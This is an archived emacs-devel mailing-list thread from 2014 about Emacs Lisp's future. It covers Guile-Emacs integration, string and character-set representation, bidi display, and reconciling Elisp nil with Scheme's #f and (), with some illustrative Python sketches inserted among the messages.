>> Cc: Eli Zaretskii <eliz@gnu.org>,  Kenichi Handa <handa@gnu.org>,
>> dmantipov@yandex.ru,  emacs-devel@gnu.org
>> Date: Sat, 27 Sep 2014 13:13:26 +0200
>> 
>> However, the problems specific to R->L typesetting are mostly not in the
>> character set and string handling area but rather concern the display
>> algorithms where we already found that supporting all the functionality
>> of Emacs is not well-supported by industry-standard solutions like
>> Pango.

> Only people who don't speak any of the R2L languages can seriously
> claim that using Pango/Cairo is the way to support R2L in Emacs.
> There are just too many quirks that Emacs needs for user satisfaction
> that an external GP renderer can never provide.

> Using Pango also means you are at the mercy of their developers as far
> as bidi is concerned.  And it doesn't help that the development in
> that area is not really "alive and kicking" as one would hope; e.g.,
> the latest changes in UAX#9, released with Unicode 6.3 a year ago, are
> still not supported in Pango or FriBidi.

> Besides, using Pango means no bidi in text-mode frames.  (Some people
> say this should be delegated to bidi-aware terminal emulators, like
> PuTTY and some Linux-based emulator whose name I don't remember, but
> that's again only because those people don't use the R2L scripts.
> Doing bidi display for TTY Emacs this way is simply unworkable.)




* Re: Emacs Lisp's future
  2014-09-27 14:04                   ` Stefan Monnier
@ 2014-09-27 14:24                     ` David Kastrup
  2014-09-27 15:24                       ` Stefan Monnier
                                         ` (2 more replies)
  0 siblings, 3 replies; 261+ messages in thread
From: David Kastrup @ 2014-09-27 14:24 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel

Stefan Monnier <monnier@iro.umontreal.ca> writes:

> Could you move on to some other discussion?
> I mean, it's not like this is a problem we need to fix now (if ever).

Uh, Pango was an analogy example.  The actual question was whether Emacs
can or should delegate its character encoding/decoding processing (not
really significantly related to Pango but subject to similar
considerations) to GUILE's current mechanisms.  Which seem to be
libunistring via libiconv (both GNU libraries it would appear) rather
than the ICU mentioned elsewhere.

> So let's cross this bridge when we get there.

The GUILE bridge is there.  Robin Templeton's status of the port is that
it is mostly complete, with strings/buffers being the most notable part
obliterating acceptable performance via thick glue layers between Emacs'
and GUILE's different implementations of similar concepts.

Removing the thick glue layer requires that Emacs and GUILE strings (and
Emacs buffers and GUILE whatever) become exchangeable and offer the same
operations without impacting performance for either.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-09-27 14:24                     ` David Kastrup
@ 2014-09-27 15:24                       ` Stefan Monnier
  2014-09-27 15:41                         ` David Kastrup
  2014-09-27 17:04                       ` Taylan Ulrich Bayirli/Kammer
  2014-09-27 19:33                       ` Robin Templeton
  2 siblings, 1 reply; 261+ messages in thread
From: Stefan Monnier @ 2014-09-27 15:24 UTC (permalink / raw)
  To: David Kastrup; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel

>> Could you move on to some other discussion?
>> I mean, it's not like this is a problem we need to fix now (if ever).
> Uh, Pango was an analogy example.  The actual question was whether Emacs
> can or should delegate its character encoding/decoding processing (not
> really significantly related to Pango but subject to similar
> considerations) to GUILE's current mechanisms.  Which seem to be
> libunistring via libiconv (both GNU libraries it would appear) rather
> than the ICU mentioned elsewhere.

And, again: it's not like this is a problem we need to fix now (if ever).

> The GUILE bridge is there.  Robin Templeton's status of the port is that
> it is mostly complete, with strings/buffers being the most notable part
> obliterating acceptable performance via thick glue layers between Emacs'
> and GUILE's different implementations of similar concepts.

Do you know this to be a fact?  AFAIK, Guile-Emacs could perfectly live
with having Emacs buffers, Emacs strings, and Scheme strings, with no
extra cost, except when you *want* to convert between them (but as long
as you don't run any Scheme, you shouldn't need/want to do any such
conversion).


        Stefan




* Re: Emacs Lisp's future
  2014-09-27  8:59           ` David Kastrup
@ 2014-09-27 15:30             ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-09-27 15:30 UTC (permalink / raw)
  To: David Kastrup; +Cc: Dmitry Antipov, emacs-devel

David Kastrup writes:

 > If it would not take much effort, then it should be attempted
 > independently.

Oh, it will.  But given what I've already got on my schedule, if I get
to it before Emacs does, shame on Emacs.





* Re: Emacs Lisp's future
  2014-09-27 11:13               ` David Kastrup
  2014-09-27 12:00                 ` Eli Zaretskii
@ 2014-09-27 15:34                 ` Stephen J. Turnbull
  1 sibling, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-09-27 15:34 UTC (permalink / raw)
  To: David Kastrup; +Cc: Kenichi Handa, Eli Zaretskii, dmantipov, emacs-devel

David Kastrup writes:

 > In short, it is not likely we are talking about a no-brainer regarding
 > rebasing MULE on something else.  If we were, it would appear to me that
 > XEmacs would have had more to gain from such a step than Emacs, and
 > there is likely some reason that they chose not to do so.

The reason for using Mule code in XEmacs in the first place was that
by the time anybody who understood multilingual processing (because
they suffered from it) came along, Sun had already awarded the contract to
Ben et al and it was a done deal.  Since then, we haven't fixed it
because I'm at best slow and mistake-prone as a programmer, and nobody
else really cares.  Believe me, I *want* to do it.







* Re: Emacs Lisp's future
  2014-09-27 15:24                       ` Stefan Monnier
@ 2014-09-27 15:41                         ` David Kastrup
  2014-09-27 15:57                           ` Stefan Monnier
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-09-27 15:41 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel

Stefan Monnier <monnier@iro.umontreal.ca> writes:

>>> Could you move on to some other discussion?
>>> I mean, it's not like this is a problem we need to fix now (if ever).
>> Uh, Pango was an analogy example.  The actual question was whether Emacs
>> can or should delegate its character encoding/decoding processing (not
>> really significantly related to Pango but subject to similar
>> considerations) to GUILE's current mechanisms.  Which seem to be
>> libunistring via libiconv (both GNU libraries it would appear) rather
>> than the ICU mentioned elsewhere.
>
> And, again: it's not like this is a problem we need to fix now (if ever).
>
>> The GUILE bridge is there.  Robin Templeton's status of the port is that
>> it is mostly complete, with strings/buffers being the most notable part
>> obliterating acceptable performance via thick glue layers between Emacs'
>> and GUILE's different implementations of similar concepts.
>
> Do you know this to be a fact?

<URL:http://www.emacswiki.org/emacs/GuileEmacs#toc9> is about keeping
them separate.

<URL:http://www.emacswiki.org/emacs/GuileEmacsTodo> lists "Unify Elisp
and Scheme strings".

I thought I read something from Robin about buffers/strings being a
performance issue, but searching on the respective developer lists
points rather to dynamic scopes and/or buffer-local variables.

> AFAIK, Guile-Emacs could perfectly live with having Emacs buffers,
> Emacs strings, and Scheme strings, with no extra cost, except when you
> *want* to convert between them (but as long as you don't run any
> Scheme, you shouldn't need/want to do any such conversion).

GUILE runs on a VM and obviously the native data types known to the VM
will be favored regarding its performance.  It may be that the cost of
processing strings is such that it will dominate the VM code processing,
but since one of the most fundamental data types of both Scheme and Lisp
are interned strings (namely symbols), I'd still expect quite a bit of
unnecessary churn when Emacs strings cannot just use GUILE primitives.
Not least of all maintaining two sets of primitives.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-09-27 15:41                         ` David Kastrup
@ 2014-09-27 15:57                           ` Stefan Monnier
  2014-09-27 16:25                             ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Stefan Monnier @ 2014-09-27 15:57 UTC (permalink / raw)
  To: David Kastrup; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel

>>> The GUILE bridge is there.  Robin Templeton's status of the port is that
>>> it is mostly complete, with strings/buffers being the most notable part
>>> obliterating acceptable performance via thick glue layers between Emacs'
>>> and GUILE's different implementations of similar concepts.
>> Do you know this to be a fact?
> <URL:http://www.emacswiki.org/emacs/GuileEmacs#toc9> is about keeping
> them separate.
> <URL:http://www.emacswiki.org/emacs/GuileEmacsTodo> lists "Unify Elisp
> and Scheme strings".
> I thought I read something from Robin about buffers/strings being a
> performance issue, but searching on the respective developer lists
> points rather to dynamic scopes and/or buffer-local variables.

IOW, you do *not* know for a fact that this lack of unification is
a current source of performance problems.
Thought so.


        Stefan




* Re: Emacs Lisp's future
  2014-09-27 15:57                           ` Stefan Monnier
@ 2014-09-27 16:25                             ` David Kastrup
  2014-09-27 17:23                               ` Stefan Monnier
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-09-27 16:25 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel

Stefan Monnier <monnier@iro.umontreal.ca> writes:

>>>> The GUILE bridge is there.  Robin Templeton's status of the port is that
>>>> it is mostly complete, with strings/buffers being the most notable part
>>>> obliterating acceptable performance via thick glue layers between Emacs'
>>>> and GUILE's different implementations of similar concepts.
>>> Do you know this to be a fact?
>> <URL:http://www.emacswiki.org/emacs/GuileEmacs#toc9> is about keeping
>> them separate.
>> <URL:http://www.emacswiki.org/emacs/GuileEmacsTodo> lists "Unify Elisp
>> and Scheme strings".
>> I thought I read something from Robin about buffers/strings being a
>> performance issue, but searching on the respective developer lists
>> points rather to dynamic scopes and/or buffer-local variables.
>
> IOW, you do *not* know for a fact that this lack of unification is
> a current source of performance problems.
> Thought so.

Shrug.  I'm currently working on integrating GUILE 2.0 into LilyPond,
and GUILE 2.0 has Unicode strings which are either UCS-8 or UCS-32 in
the strings and UTF-8 in string ports (which are sort of like Emacs
buffers on steroid withdrawal).  So at the current point of time, Emacs
and GUILE strings would need reencoding/decoding at every call gate
anyway as long as string access is not abstracted well enough in the
Emacs code base that the different internal coding would not require
code changes.  The VM costs would be negligible in comparison with that.

I don't think that having to retain a separate implementation of strings
in Emacs makes much sense in the course of integrating GUILE and Emacs.
"reencode at every call gate" is not feasible for tight interaction, and
tight interaction is desirable for an extension language after all.

In our case, LilyPond has a lot of head-scratching to do in order to
arrive at a state where GUILE and C++ strings can be passed through the
system reasonably efficiently, since LilyPond _is_ designed to tightly
interact with GUILE.  The basic expediency mechanism is to tell GUILE
"this is all latin-1" which it will then keep in UCS-8.  Whenever there
is an interest in Unicode string processing, we need to reencode.
LilyPond itself is actually talking UTF-8 to its users.  This kind of
"we work with UTF-8, but consider it to be UCS-8 instead since we cannot
or do not want to afford the price you demand for treating it as UTF-8"
is not really a satisfactory solution, and I expect this to become an
issue in other applications.
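
The "this is all latin-1" expedient described above can be illustrated
with a small sketch.  It is written in Python purely as a model; it does
not use GUILE's or LilyPond's actual string APIs, and the sample text is
made up.  It shows why treating UTF-8 bytes as one-byte characters is
cheap but gives the wrong character count, and why real Unicode
processing then needs a reencoding pass.

```python
# Illustrative model only: not GUILE or LilyPond code.
text = "Größe"                      # 5 characters, two of them non-ASCII
utf8_bytes = text.encode("utf-8")   # 7 bytes: "ö" and "ß" take two bytes each

# The expedient: declare the bytes to be Latin-1, one character per byte.
# No transcoding work is done, but the result is not the real text.
as_latin1 = utf8_bytes.decode("latin-1")

print(len(text), len(as_latin1))    # the character counts disagree
print(as_latin1 == text)            # the strings are not equal

# Getting real Unicode text back costs a full reencode/decode pass,
# which is the "reencode at every call gate" price mentioned above.
recovered = as_latin1.encode("latin-1").decode("utf-8")
print(recovered == text)
```

Indexing, case conversion, and length on `as_latin1` operate on bytes of
the UTF-8 encoding rather than on characters, which is the
unsatisfactory part of the scheme.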

So I pretty much expect that we'll see GUILE migrating to a UTF-8-based
string representation eventually, with all the head-scratching regarding
indexing and rewriting strings (aset anybody?) that Emacs has seen.
In case that happens, matching Emacs strings would make a lot of sense.

Admittedly, that is more a problem of GUILE than Emacs.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-09-27 14:24                     ` David Kastrup
  2014-09-27 15:24                       ` Stefan Monnier
@ 2014-09-27 17:04                       ` Taylan Ulrich Bayirli/Kammer
  2014-09-27 19:33                       ` Robin Templeton
  2 siblings, 0 replies; 261+ messages in thread
From: Taylan Ulrich Bayirli/Kammer @ 2014-09-27 17:04 UTC (permalink / raw)
  To: David Kastrup
  Cc: dmantipov, emacs-devel, handa, Stefan Monnier, Eli Zaretskii,
	stephen

David Kastrup <dak@gnu.org> writes:

> The GUILE bridge is there.  Robin Templeton's status of the port is
> that it is mostly complete, with strings/buffers being the most
> notable part obliterating acceptable performance via thick glue layers
> between Emacs' and GUILE's different implementations of similar
> concepts.
>
> Removing the thick glue layer requires that Emacs and GUILE strings
> (and Emacs buffers and GUILE whatever) become exchangeable and offer
> the same operations without impacting performance for either.

Guile supports extra/foreign types just fine (so-called SMOBs), which is
what strings and buffers are in Guile-Emacs so far, and if I understood
Robin right then the intention is to keep them so for a while, probably
even in the first "release" of Guile-Emacs.

SMOB types don't cause any extra memory usage or data access time AFAIK
so that probably works fine, the only problem being that Scheme and
Elisp strings are two different data types.  You get all of the other
benefits in the meantime, which don't involve the mixing of Scheme and
Elisp code.

Taylan




* Re: Emacs Lisp's future
  2014-09-27 16:25                             ` David Kastrup
@ 2014-09-27 17:23                               ` Stefan Monnier
  2014-09-28 23:22                                 ` Richard Stallman
  0 siblings, 1 reply; 261+ messages in thread
From: Stefan Monnier @ 2014-09-27 17:23 UTC (permalink / raw)
  To: David Kastrup; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel

> I don't think that having to retain a separate implementation of strings
> in Emacs makes much sense in the course of integrating GUILE and Emacs.

There's integration and integration.
Currently Guile-Emacs is about replacing the GC and byte-code
interpreter of Emacs with Guile's.  Most of the actual primitives used
are Emacs's own, AFAIK (with some exceptions, such as the things that
touch cons cells and numbers, IIUC).

I'm not really interested in spending time improving Guile.  The goal of
Guile-Emacs (from Emacs's point of view) is to use some pre-existing VM
so as to avoid spending time on Emacs's own.
So if we can't make use of Guile's strings because they're not good
enough, then we won't use them.

Of course, maybe we'll have to manipulate Guile's strings in order to
use Guile's FFI or some Scheme library.  If/when that becomes
a performance problem, we'll see what needs to be done about that.
Until then:

   it's not like this is a problem we need to fix now (if ever).


-- Stefan




* Re: Emacs Lisp's future
  2014-09-27 14:24                     ` David Kastrup
  2014-09-27 15:24                       ` Stefan Monnier
  2014-09-27 17:04                       ` Taylan Ulrich Bayirli/Kammer
@ 2014-09-27 19:33                       ` Robin Templeton
  2014-09-28  7:17                         ` David Kastrup
  2 siblings, 1 reply; 261+ messages in thread
From: Robin Templeton @ 2014-09-27 19:33 UTC (permalink / raw)
  To: emacs-devel

David Kastrup <dak@gnu.org> writes:

> The GUILE bridge is there.  Robin Templeton's status of the port is that
> it is mostly complete, with strings/buffers being the most notable part
> obliterating acceptable performance via thick glue layers between Emacs'
> and GUILE's different implementations of similar concepts.

Unifying the Elisp and Scheme string types is important, but more of a
long-term goal to allow convenient and efficient interaction between the
languages. Guile-Emacs's performance problems are mostly unrelated to
string handling. Elisp string representation is unchanged from standard
Emacs, except for trivial changes to make them an application-defined
Guile type.

-- 
Inteligenta persono lernas la lingvon Esperanton rapide kaj facile.
Esperanto estas moderna, kultura lingvo por la mondo. Simpla, fleksebla,
belsona, Esperanto estas la praktika solvo de la problemo de universala
interkompreno. Lernu la interlingvon Esperanton!





* Re: Emacs Lisp's future
  2014-09-27 19:33                       ` Robin Templeton
@ 2014-09-28  7:17                         ` David Kastrup
  0 siblings, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-09-28  7:17 UTC (permalink / raw)
  To: emacs-devel

Robin Templeton <robin@terpri.org> writes:

> David Kastrup <dak@gnu.org> writes:
>
>> The GUILE bridge is there.  Robin Templeton's status of the port is that
>> it is mostly complete, with strings/buffers being the most notable part
>> obliterating acceptable performance via thick glue layers between Emacs'
>> and GUILE's different implementations of similar concepts.
>
> Unifying the Elisp and Scheme string types is important, but more of a
> long-term goal to allow convenient and efficient interaction between the
> languages. Guile-Emacs's performance problems are mostly unrelated to
> string handling. Elisp string representation is unchanged from standard
> Emacs, except for trivial changes to make them an application-defined
> Guile type.

Ok, this is different _currently_ from the situation we have in LilyPond
where string interaction between C++, LilyPond, and GUILE was already
ubiquitous when GUILE 2.0 started supporting Unicode in its strings.

Emacs has strategies and conventions for passing strings between C
(literals, but also I/O and stuff) and Elisp reasonably cheaply whenever
cheap is an option.  When it is running on a GUILE VM, I don't see that
it will get by without addressing similar questions regarding the GUILE
domain.

Though to be honest: the typical Emacs programmer is not usually exposed
to the details of byte code in any way either.

-- 
David Kastrup





* Re: Emacs Lisp's future
  2014-09-27 17:23                               ` Stefan Monnier
@ 2014-09-28 23:22                                 ` Richard Stallman
  2014-09-29  1:33                                   ` Stefan Monnier
  2014-10-05  7:53                                   ` Mark H Weaver
  0 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-09-28 23:22 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: dak, dmantipov, emacs-devel, handa, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    So if we can't make use of Guile's strings because they're not good
    enough, then we won't use them.

Unfortunately, that would put a major crimp in interoperability between
Emacs Lisp programs and Scheme programs.

Can the Guile developers work on making Guile strings flexible
enough that Emacs can use them?  So that they can do the jobs
Emacs Lisp strings do?

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-09-28 23:22                                 ` Richard Stallman
@ 2014-09-29  1:33                                   ` Stefan Monnier
  2014-09-29 20:48                                     ` Richard Stallman
  2014-10-05  7:53                                   ` Mark H Weaver
  1 sibling, 1 reply; 261+ messages in thread
From: Stefan Monnier @ 2014-09-29  1:33 UTC (permalink / raw)
  To: Richard Stallman; +Cc: dak, dmantipov, emacs-devel, handa, eliz, stephen

> Unfortunately, that would put a major crimp in interoperability between
> Emacs Lisp programs and Scheme programs.

Such interoperability would be nice to have, indeed, but is not
absolutely necessary.  In any case this is a problem that Emacs can't
solve, so if you want to discuss it, please do that on Guile's
mailing-list.


        Stefan




* Re: Emacs Lisp's future
  2014-09-27  9:32           ` Eli Zaretskii
  2014-09-27 10:37             ` Stephen J. Turnbull
@ 2014-09-29 13:17             ` K. Handa
  1 sibling, 0 replies; 261+ messages in thread
From: K. Handa @ 2014-09-29 13:17 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: stephen, dmantipov, dak, emacs-devel

In article <837g0ptnlj.fsf@gnu.org>, Eli Zaretskii <eliz@gnu.org> writes:

> > No, you don't.  There's plenty of private space for those purposes
> > (unless you know of private character sets that use more than two
> > whole planes?)

> I take it that you have studied the charsets for which we use
> codepoints above 0x10FFFF, and concluded that they all fit in the
> 2*64K+6.4K PUA space provided by Unicode?  We have several quite large
> character sets which need that (grep mule-conf.el for ":unify-map" to
> see the list, and see etc/charsets/ for the map files).  I'm not sure
> the PUA space is large enough, but I didn't sum all the numbers.

> In any case, the question why we don't use PUA for this is best
> addressed to Handa-san (CC'ed).

The biggest character set is GB18030, which includes all Unicode
characters (including the PUA) plus several PUAs of its own.  So
the Unicode code points are simply not enough to support the
full GB18030.

In addition, almost all 2-byte CJK character sets contain
their own PUAs.  As Emacs doesn't unify characters in those
PUAs with Unicode's PUA characters, we can handle several of
those character sets at the same time.
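
The size argument can be checked with a few lines of arithmetic.  The
sketch below is in Python for convenience; the private-use ranges are
those defined by Unicode, and 0x3FFFFF is assumed to be the largest
Emacs character code (the value of `(max-char)` in current Emacs).

```python
# Unicode private-use ranges (inclusive bounds).
PUA_RANGES = [
    (0xE000, 0xF8FF),      # BMP private use area: the "6.4K"
    (0xF0000, 0xFFFFD),    # plane 15: one "64K"
    (0x100000, 0x10FFFD),  # plane 16: the other "64K"
]
pua_total = sum(hi - lo + 1 for lo, hi in PUA_RANGES)

UNICODE_MAX = 0x10FFFF
EMACS_MAX_CHAR = 0x3FFFFF  # assumption: value of (max-char) in Emacs

# Code points Emacs can use beyond the Unicode range.
beyond_unicode = EMACS_MAX_CHAR - UNICODE_MAX

print(pua_total)       # 137468
print(beyond_unicode)  # 3080192

# A charset that already covers every Unicode code point, PUA included,
# and then adds even one private character of its own cannot be mapped
# one-to-one into Unicode alone.
extra_private_chars = 1  # hypothetical minimum, for illustration
needs_more_than_unicode = (UNICODE_MAX + 1) + extra_private_chars > UNICODE_MAX + 1
print(needs_more_than_unicode)
```

The space above 0x10FFFF is more than twenty times the size of all
Unicode private-use areas combined, which is what allows several
charset-specific PUAs to coexist without being unified.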

---
Kenichi Handa
handa@gnu.org




* Re: Emacs Lisp's future
  2014-09-29  1:33                                   ` Stefan Monnier
@ 2014-09-29 20:48                                     ` Richard Stallman
  0 siblings, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-09-29 20:48 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: dak, dmantipov, emacs-devel, handa, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

      In any case this is a problem that Emacs can't
    solve, so if you want to discuss it, please do that on Guile's
    mailing-list.

Guile developers need to talk with Emacs developers to find
a good solution.  I posted here since the Guile developers seem
to be here along with the Emacs developers.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-09-28 23:22                                 ` Richard Stallman
  2014-09-29  1:33                                   ` Stefan Monnier
@ 2014-10-05  7:53                                   ` Mark H Weaver
  2014-10-05  9:01                                     ` David Kastrup
                                                       ` (3 more replies)
  1 sibling, 4 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-05  7:53 UTC (permalink / raw)
  To: Richard Stallman
  Cc: dak, dmantipov, emacs-devel, handa, Stefan Monnier, eliz, stephen

Richard Stallman <rms@gnu.org> writes:
>     So if we can't make use of Guile's strings because they're not good
>     enough, then we won't use them.
>
> Unfortunately, that would put a major crimp in interoperability between
> Emacs Lisp programs and Scheme programs.
>
> Can the Guile developers work on making Guile strings flexible
> enough that Emacs can use them?  So that they can do the jobs
> Emacs Lisp strings do?

I would like to change Guile's internal string representation to use a
generalization of UTF-8, as used by Emacs.  There are two sticking
points that require more thought, however:

* I'm concerned that there are security implications to supporting the
  "raw byte" code points.  I can expand on this more if you'd like.

  However, I think this will not be a problem, because the
  string<->bytevector conversion procedures could support two modes of
  operation: one mode that supports these raw bytes, for use by emacs
  and maybe some other purposes (e.g. dealing with POSIX file names),
  and another mode that refuses to accept or produce invalid UTF-8,
  which would be used by programs where security is a concern.  I'm
  inclined to make the standard Scheme procedures use the strict mode
  by default.

* I'm not sure that Guile strings should include property lists.  One
  can reasonably assume that competent Elisp programmers will keep in
  mind that Elisp strings are more than just characters, but we cannot
  expect that of Scheme programmers, and they've never had any tools to
  deal with it in any case.  Emacs Lisp includes procedures such as
  'substring-no-properties', but Scheme has never had anything like
  that.

Supporting property lists in Scheme raises difficult questions
such as:

 * What should the Scheme procedures 'string=?' and 'equal?' do when
   comparing two strings with equal character sequences but
   unequal property lists?

 * Should Scheme procedures such as 'substring', 'string-append',
   'string-upcase', etc, propagate the associated property list
   data?

 * Are there security implications to carrying around and possibly
   propagating (via Scheme's "substring") extra information that is
   effectively invisible to all procedures that have ever been
   available in Scheme?

 * What should Scheme's 'write' do when applied to a string that
   includes a property list?  ('write' is analogous to 'prin1').
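
To make these questions concrete, here is a toy model in Python.  The
`PropString` class, its fields, and the `keep_props` flag are all
hypothetical names invented for this sketch; it is neither Emacs's nor
Guile's string implementation.  It only shows that "equal" and
"substring" each have two defensible answers once invisible properties
are attached.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class PropString:
    """Toy string with text properties (hypothetical, for illustration)."""
    chars: str
    props: tuple = ()   # (start, end, name, value) intervals, end exclusive

    def substring(self, start, end, keep_props=True):
        """Return chars[start:end], optionally carrying clipped properties."""
        kept = ()
        if keep_props:
            kept = tuple(
                (max(s, start) - start, min(e, end) - start, name, value)
                for (s, e, name, value) in self.props
                if s < end and e > start
            )
        return PropString(self.chars[start:end], kept)


plain = PropString("secret token")
marked = PropString("secret token", ((0, 6, "face", "bold"),))

# Question 1: are these "the same string"?
print(plain.chars == marked.chars)  # characters only: True
print(plain == marked)              # characters and properties: False

# Question 2: does a substring carry the invisible data along?
print(marked.substring(0, 6).props)
print(marked.substring(0, 6, keep_props=False).props)
```

The second call plays the role of 'substring-no-properties'; a Scheme
program that only knows 'substring' has no way to ask for it.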

Security concerns are more important for Guile than for Emacs, because
Guile is already being used to implement network programs such as web
servers, and generally aims to support a much wider range of
applications.
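
The two conversion modes proposed for the "raw byte" code points have a
close analogue in Python's `surrogateescape` error handler, which is
used here only as an analogy: Python smuggles undecodable bytes through
as lone surrogates, whereas Emacs uses its own raw-byte code points.
The file name is made up.

```python
raw = b"caf\xe9.txt"   # a Latin-1 encoded file name; not valid UTF-8

# Lenient mode: undecodable bytes are mapped to reserved code points,
# so arbitrary bytes (e.g. POSIX file names) round-trip unchanged.
lenient = raw.decode("utf-8", errors="surrogateescape")
round_tripped = lenient.encode("utf-8", errors="surrogateescape")
print(round_tripped == raw)

# Strict mode: invalid UTF-8 is refused on input ...
try:
    raw.decode("utf-8")
    strict_accepts_input = True
except UnicodeDecodeError:
    strict_accepts_input = False

# ... and a string carrying smuggled bytes is refused on output.
try:
    lenient.encode("utf-8")
    strict_accepts_output = True
except UnicodeEncodeError:
    strict_accepts_output = False

print(strict_accepts_input, strict_accepts_output)
```

A security-sensitive program would use only the strict conversions, so
that nothing leaving it can contain bytes that are not valid UTF-8.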

At the very least, we can plan to eventually make Emacs strings
representable as Guile strings plus property lists.  Going further
will require more consideration, I think.

* * *

While we're on the subject of interoperability between Emacs Lisp and
Scheme programs, I'm concerned about nil.  Modern Scheme requires that
() and #f are distinct objects, and that () is treated as true by 'if'.
This has been the case for long enough now that it's not uncommon for
modern Scheme code to depend on these facts.  Of course, Elisp code
depends on the end-of-list and false values being the same object.

The way we're coping with this is by having three distinct objects in
Guile: (), #f, and #nil, where both () and #nil are considered
end-of-list markers by 'null?', both #f and #nil are considered false by
Scheme 'if', and all three are seen as null by Elisp.

First of all, clearly this is not quite correct.  Scheme code might
assume that if a value is false, it cannot be the empty list, or vice
versa, but the hope is that it will mostly work in practice.

However, I see a problem that will become more common if Scheme and
Elisp code become more intertwined.  The problem occurs when Elisp code
sees that a value 'x' is null and then copies it somewhere, where the
original 'x' was conceptually an end-of-list, but the copy is
conceptually a boolean false (or vice versa).

(I'm aware that for some Elisp values, it may not even be possible to
say it's "conceptually an end-of-list" or "conceptually a boolean
false", but please bear with me).

The problem comes when 'x' originated in Scheme code as (), is later
copied by Elisp code into something that's conceptually a boolean, and
then that copy is inspected by Scheme code.  The intent was that the
copied boolean would be false, but the Scheme code will see () and treat
it as true.
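
To make the failure mode concrete, here is a minimal sketch in Python
that models the three objects and the predicates described above.  The
names EMPTY_LIST, FALSE, NIL and the helper functions are invented for
this illustration; they are not Guile or Emacs APIs, and the model
ignores everything except the null/false tests.

```python
# Toy model of the three objects; all names here are illustrative only.
class Sentinel:
    def __init__(self, name):
        self.name = name

    def __repr__(self):
        return self.name


EMPTY_LIST = Sentinel("()")   # Scheme end-of-list
FALSE = Sentinel("#f")        # Scheme boolean false
NIL = Sentinel("#nil")        # Elisp nil


def scheme_null(x):
    """Scheme 'null?': both () and #nil end a list."""
    return x is EMPTY_LIST or x is NIL


def scheme_truthy(x):
    """Scheme 'if': only #f and #nil are false, so () counts as true."""
    return not (x is FALSE or x is NIL)


def elisp_null(x):
    """Elisp 'null': all three objects look like nil."""
    return x is EMPTY_LIST or x is FALSE or x is NIL


def elisp_copy_flag(x):
    """Elisp-side code that stores x unchanged as a conceptual boolean."""
    return x


# A list tail created by Scheme code reaches Elisp as ().
tail = EMPTY_LIST
assert elisp_null(tail)          # Elisp treats it as nil, i.e. false

# Elisp copies it into a slot that is meant to hold a boolean "false".
flag = elisp_copy_flag(tail)

# Scheme later tests the flag and takes the "true" branch.
print(scheme_truthy(flag))       # prints True
```

Note that no #nil object appears anywhere in this scenario: the value
is () from start to finish, and only its intended meaning changes.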

What do you think?  Do I worry too much? :)

      Mark




* Re: Emacs Lisp's future
  2014-10-05  7:53                                   ` Mark H Weaver
@ 2014-10-05  9:01                                     ` David Kastrup
  2014-10-05 10:43                                     ` Stephen J. Turnbull
                                                       ` (2 subsequent siblings)
  3 siblings, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-05  9:01 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: Richard Stallman, dmantipov, emacs-devel, handa, Stefan Monnier,
	eliz, stephen

Mark H Weaver <mhw@netris.org> writes:

> * I'm not sure that Guile strings should include property lists.

I already mentioned that string ports could be turned into the basic
underlying data representation for Emacs buffers.  That's one case where
it is quite obvious that a string port alone is not a sufficient
representation.

> One can reasonably assume that competent Elisp programmers will keep
> in mind that Elisp strings are more than just characters, but we
> cannot expect that of Scheme programmers, and they've never had any
> tools to deal with it in any case.  Emacs Lisp includes procedures
> such as 'substring-no-properties', but Scheme has never had anything
> like that.
>
> Supporting property lists in Scheme raises difficult questions
> such as:
>
>  * What should the Scheme procedures 'string=?' and 'equal?' do when
>    comparing two strings with equal character sequences but
>    unequal property lists?
>
>  * Should Scheme procedures such as 'substring', 'string-append',
>    'string-upcase', etc, propagate the associated property list
>    data?
>
>  * Are there security implications to carrying around and possibly
>    propagating (via Scheme's "substring") extra information that is
>    effectively invisible to all procedures that have ever been
>    available in Scheme?
>
>  * What should Scheme's 'write' do when applied to a string that
>    includes a property list?  ('write' is analogous to 'prin1').

I should think that GOOPS, the basis for GUILE's builtin object
hierarchy, basically provides all the necessary mechanisms for
transparently making "richer" string variants maintain their additional
data when being manipulated by standard operations.

So while Emacs development would likely benefit from the willingness to
refactor some string internals in a different manner, ultimately the
work of Emacs data implementors should not require tight interaction
with GUILE development.

